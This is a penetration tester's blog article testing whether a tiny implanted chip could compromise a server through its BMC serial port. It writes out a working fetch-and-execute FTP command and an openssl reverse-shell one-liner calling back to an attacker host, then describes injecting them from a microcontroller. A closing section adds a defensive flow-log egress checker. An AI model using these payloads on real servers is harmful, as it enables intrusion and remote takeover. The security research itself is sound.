This is a Bulletproof Tech Talk article: original research from our penetration testing team covering issues, news, and tech that interests them. It’s more technical and in-depth than our usual blog content, but no less interesting.
Some readers may remember an article published by Bloomberg entitled "The Big Hack: How China used a Tiny Chip to Infiltrate U.S. Companies". The article alleges that third-party Chinese circuit board manufacturers were secretly embedding tiny "spy chips" into server mainboards in order to get their hands on sensitive information, and had been doing so for years. The alleged devices were smaller than a grain of rice and would go unnoticed among the densely packed components that go into making a server mainboard.
This was met with some scepticism in certain circles of the tech community. The received wisdom of the time was that the spy chips reportedly had only six connections to the outside world and were so small that it would be practically impossible to embed enough memory and processing power into the device to make it do what it was alleged to do. Sceptics doubted the spy chips’ ability to intercept and modify data flowing through the system via "buses" which, incidentally, consist of many more connections than a tiny six-pin chip would be able to use. Both Bloomberg and the hardware manufacturers in question either went very quiet or strenuously denied the story soon after.
However, as a penetration tester I’m always one to challenge the received wisdom, and this got me thinking about ways that such a feat could be accomplished with such a small and simple device. Maybe these spy chips weren’t so far-fetched after all. So I grabbed an old server and got thinking...
As mentioned in the original article, most servers possess a BMC, or Baseboard Management Controller, that’s used for monitoring hardware parameters such as temperature and cooling fan status, and for otherwise remotely managing the server. This device, often a SoC, or System-on-Chip, runs entirely independently of the main CPUs in the server. The BMC has its own operating system, memory, storage, and network, separate from the main server. It’s also powered by its own always-on standby supply, and hence is available whether the server is powered up or not.
In a minimal configuration, the BMC may be accessed over the network using protocols such as IPMI; more advanced management controllers also have web interfaces with features such as mounting virtual media. One interface that is usually not exposed to the user is the BMC serial port, which is used at the factory for pre-configuring and diagnosing the controller before it is shipped to customers.
Because this interface is not easily accessible, it is often left unsecured. This is ‘security by obscurity’, and is almost always a bad idea: when connected to this serial interface, it may provide a privileged shell with no authentication required. For the purposes of this research, I got my hands on a retired Dell PowerEdge R210 server. The image below shows the unpopulated PCB pads connecting to the BMC’s serial port on this particular machine.
Because of these security oversights, I reasoned that this might be a viable attack vector, considering the following facts:
The last of the three facts above led me to look for devices that would be fit for purpose. As it was only a serial interface, they wouldn't need to be particularly fast or have a large number of pins (hence only a small-footprint device was needed), and with a small payload they wouldn't need a huge amount of memory to store it. With this in mind, after some research, the following devices were considered:
These chips are tiny – a maximum of 2mm x 2mm, and have between 6 and 16 pins. Pencil tip for scale.
As you might imagine from such small devices, each one had certain limitations. After putting the devices through their paces and comparing them to my list of requirements, I chose the tiny ATtiny10. Despite its size, this little chip has some reasonably good specifications:
The next step was to determine what facilities were available to me in the BMC’s operating system, and from that, craft a small payload that could be deployed from our spy chip. To get going, I wired up the BMC directly to my system using a USB to serial adaptor so I could interact with it.
During boot-up, which took around two minutes, the BMC was found to be using a bit rate of 115200 baud.
After booting was completed, it was simply a matter of pressing 'Enter' to get a privileged 'root' prompt – no authentication required! Told you ‘security by obscurity’ is a bad idea.
I spent a day or so exploring what commands were available in this somewhat limited system, and which payloads could be used with them. I decided that a staged payload would be best, as the memory available on my spy chip was limited, so all the first stage would need to do was pull the larger second stage from an FTP server and execute it. This also allowed for some flexibility, as the second stage could be changed as needed and could be much larger if required (there was 45 MB of volatile storage available, so plenty of room).
Commands such as curl and scp weren't available on the BMC, so I stuck with trusty FTP and set up an appropriate server. The first-stage payload was written using commands already available on the BMC, the result being:
ftpget -u ftp -p pass 192.168.1.67 /tmp/payload payload && chmod 755 /tmp/payload && /tmp/payload
This would grab a file called 'payload' off an anonymous FTP server of our choice, set it as executable, and run it.
The second-stage payload was a little more difficult to create, as a number of tools, such as netcat, nc and bash sockets, weren't available, and a reverse SSH connection wouldn't work without needing a bunch of configuration files. However, openssl was available, and could be used to open sockets and redirect input and output:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.67:4242 > /tmp/s; rm -f /tmp/s
This would open an SSL connection back to a waiting netcat server listening on port 4242 on the attacker machine.
Both payloads in combination were tested and were found to work, with a reverse shell being opened back to the attacker machine.
Now onto the hardware...
Fully implementing this on one of my tiny microcontrollers, while certainly feasible, would require a lot of manual assembly-language coding in order to pack all the necessary code into the small device. So, to get a proof of concept working more quickly, I grabbed a Raspberry Pi Pico running Arduino and tested whether this would work in practice with the following code:
The code starts by turning on the built-in LED, then waits two minutes for the BMC to boot, turns off the LED to indicate that the payload is about to be sent, sends two newlines, waits five seconds, and finally sends the payload.
With the server completely unplugged, the Pi Pico was wired up ready for the first test, with its power line tapped from a nearby 3.3 V supply.
Finally, we're ready to test. A netcat listener was set up, fingers were crossed, and the server power was turned on. About two minutes later, I was greeted with this:
A root shell!
To sum up, it would appear that the type of attack outlined in the Bloomberg article is absolutely feasible, with some ifs and buts. Primarily it’s contingent on the BMC's network interface having some form of Internet access. Though BMCs usually live on management networks and don’t necessarily initiate outbound connections to the Internet, there are situations where a BMC is put on a public network to download or update the main server operating system, giving the hacked BMC a chance to phone home. And that’s without diving into the murky world of exfiltrating data from air-gapped machines.
From my perspective, the Bloomberg article does seem to inflate the technical capabilities of the "Chinese spy chips" somewhat; however, I’m dealing with off-the-shelf components and limited research time. For nation-state-backed attacks with far more resources, in retrospect the article’s claims don’t seem so far-fetched at all.
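Both payload stages above leave a footprint on the wire: the BMC itself initiates an outbound FTP fetch and then an outbound TLS connection to an arbitrary port. That is exactly what a management-network gateway should never see, and it is the observable that the "phone home" caveat hinges on. The following is an added example (not code from the article or from Bulletproof) showing how flow logs from such a gateway can be checked against an explicit egress allowlist for the BMC VLAN. The log format, the BMC subnet, the allowlist, the RFC 1918 ranges used as "internal", and the sample lines are all constructed for illustration; the TEST-NET address 203.0.113.67 and port 4242 stand in for an attacker's FTP server and listener.

```python
"""
Flag outbound connections initiated by BMC addresses that fall outside an
explicit egress allowlist.  Added example, not code from the original article.
Log format, addresses, allowlist and sample lines are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed gateway flow-log format: "<ts> <proto> <src>:<sport> -> <dst>:<dport> <action>"
FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<action>ACCEPT|DROP)$"
)

# Assumption: the management VLAN the BMCs sit on.
BMC_NET = ipaddress.ip_network("10.10.0.0/24")

# Assumption: the only (destination, port) pairs a BMC legitimately needs:
# the management console / jump host, internal DNS and internal NTP.
EGRESS_ALLOW = {
    ("10.10.1.5", 443),
    ("10.10.1.53", 53),
    ("10.10.1.123", 123),
}

# RFC 1918 space, treated as "internal" for the purpose of this check.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Ports that are suspicious from a BMC regardless of destination
# (the first-stage payload in the article pulls its second stage over plaintext FTP).
NOISY_PORTS = {21: "plaintext FTP fetch", 20: "FTP data channel"}


@dataclass
class Finding:
    ts: str
    src: str
    dst: str
    dport: int
    reason: str


def parse_flow(line):
    """Return a dict of fields for a well-formed flow line, or None for anything else."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    f = m.groupdict()
    f["sport"] = int(f["sport"])
    f["dport"] = int(f["dport"])
    return f


def is_bmc(addr):
    return ipaddress.ip_address(addr) in BMC_NET


def is_internal(addr):
    a = ipaddress.ip_address(addr)
    return any(a in net for net in RFC1918)


def analyse(lines):
    """Return one Finding per BMC-initiated connection that is not on the allowlist."""
    findings = []
    for line in lines:
        f = parse_flow(line)
        if f is None or not is_bmc(f["src"]):
            continue  # unparsable, or not egress from a BMC
        if (f["dst"], f["dport"]) in EGRESS_ALLOW:
            continue  # expected management traffic
        if f["dport"] in NOISY_PORTS:
            reason = NOISY_PORTS[f["dport"]]
        elif not is_internal(f["dst"]):
            reason = "BMC initiated connection outside RFC 1918 space"
        else:
            reason = "BMC egress outside allowlist"
        if f["action"] == "ACCEPT":
            reason += " (allowed by gateway: egress policy gap)"
        findings.append(Finding(f["ts"], f["src"], f["dst"], f["dport"], reason))
    return findings


# Constructed sample flow log: two legitimate lines, then the stage-1 FTP fetch,
# the stage-2 callback, a dropped internal probe, an inbound admin session and junk.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z udp 10.10.0.21:50122 -> 10.10.1.53:53 ACCEPT",
    "2024-01-01T10:00:02Z tcp 10.10.0.21:50123 -> 10.10.1.5:443 ACCEPT",
    "2024-01-01T10:02:10Z tcp 10.10.0.21:50124 -> 203.0.113.67:21 ACCEPT",
    "2024-01-01T10:02:15Z tcp 10.10.0.21:50125 -> 203.0.113.67:4242 ACCEPT",
    "2024-01-01T10:03:00Z tcp 10.10.0.21:50126 -> 10.10.1.99:22 DROP",
    "2024-01-01T10:03:05Z tcp 192.168.5.8:40000 -> 10.10.0.21:443 ACCEPT",
    "garbage line",
]

if __name__ == "__main__":
    for fd in analyse(SAMPLE_LOG):
        print(f"{fd.ts} {fd.src} -> {fd.dst}:{fd.dport}  {fd.reason}")
```

The point of the allowlist being a set of (destination, port) pairs rather than a list of "bad" ports is that a compromised BMC can phone home on any port; a default-deny egress rule on the management VLAN, with this kind of log review to catch "ACCEPT" lines that should not exist, removes the precondition the conclusion above depends on.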
Chay’s experience as network manager, developer and sysadmin all comes together to make him an expert penetration tester. Always keen to challenge expectations and push boundaries, he’s a bastion of knowledge within his team.
Find your vulnerabilities & meet compliance requirements with penetration testing from Bulletproof. You might even get Chay working on your project.